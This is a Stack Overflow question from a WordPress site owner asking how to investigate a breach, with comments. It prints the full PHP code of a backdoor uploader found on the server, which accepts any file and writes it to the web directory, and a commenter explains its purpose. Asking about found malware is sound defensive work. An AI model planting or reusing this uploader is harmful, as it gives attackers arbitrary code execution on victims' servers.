# Suspicious files found on server in WordPress project ('wp-admin/user')

Tags: php, wordpress, security, malware, websecurity

This morning I've come across some suspicious files on my server within the WordPress *wp-admin/user* directory:

#### File *comment-zk9YV7.php*

```
<?php
if(move_uploaded_file($_FILES["Wpfl"]["tmp_name"], basename($_FILES["Wpfl"]["name"]))){
    echo (basename($_FILES["Wpfl"]["name"])."    Success");
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">
<input type=\"file\" name=\"Wpfl\"/>
<input type=\"submit\" value=\"fup\"/>
</form>
</br>task is done!";
?>
```

And a file, *comment-JR9hng.php*, consisting of the same code.

I have long suspected a breach a couple weeks ago and while this file by itself seems somewhat harmless, I can't help but imagine that there is something bigger going on.

I have since checked over the server and found nothing, but maybe I wasn't looking in the right place. My theory is that because one of the WordPress administrators had a very weak password, the WordPress administrator was accessed. Around a week ago, we also had a bunch of spam posts from the WordPress backend too, promoting some scams and malicious links. I suspect this was once again due to the very-easy-to-guess passwords.

What can I do? Are there some pointers where to look next?

Comment: that file is not harmless, it's a ***backdoor*** script uploader. with it, an attacker can upload and execute arbitrary code

Comment: I’m voting to close this question because this question does not belong on StackOverflow.com. Perhaps it belong on  https://wordpress.stackexchange.com or https://security.stackexchange.com or https://serverfault.com/ , but it does not belong on stackoverflow.com

Comment: @hanshenrik - I would say Wordpress is the best place for it, as [Strings of malicious code to look for after a hack](https://wordpress.stackexchange.com/q/415508/67532) and [Verifying that I have fully removed a WordPress hack?](https://wordpress.stackexchange.com/q/19696/67532) seem related.

Comment: @hanshenrik *Why* is it off-topic exactly? It seems to conform to the [security] tag.

Comment: The reason that this is usually considered off-topic is because there's really nothing _specific_ that we can do to help. We can say "check XYZ", turn on logging, restore from backup, etc., but they're just shots in the dark. There's a [meta about it](https://meta.stackoverflow.com/q/314002/231316), and a high-level ["How do I deal with a compromised server"](https://serverfault.com/a/218011/75021)

Comment: @ChrisHaas that's not it. The problem is that the question has little-to-nothing to do with programming, so it doesn't belong on SO. The [security] tag description even contains ```If your question is not about a specific programming problem, please consider instead asking it at Information Security SE: https://security.stackexchange.com``` - and indeed, this question is not about a programming problem.